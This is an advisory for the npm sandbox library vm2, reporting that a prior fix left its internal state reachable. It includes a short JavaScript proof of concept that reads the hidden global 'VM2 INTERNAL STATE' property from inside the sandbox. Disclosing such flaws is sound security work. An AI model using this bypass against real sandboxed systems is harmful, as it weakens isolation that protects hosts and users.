PT-2026-41697 · Npm · Vm2
Publicado
2026-05-08
·
Atualizado
2026-05-08
CVSS v3.1
5.3
Média
| Vetor | AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
Summary
https://github.com/patriksimek/vm2/security/advisories/GHSA-wp5r-2gw5-m7q7 is not fully patched.
Details
It is still possible to get access to
VM2 INTERNAL STATE DO NOT USE OR PROGRAM WILL FAIL.PoC
js
const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
globalThis['VM2 INTERNAL STATE DO NOT USE OR PROGRAM WILL FAIL']
`));Correção
Protection Mechanism Failure
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Enumeração de Fraquezas
Identificadores relacionados
Produtos afetados
Vm2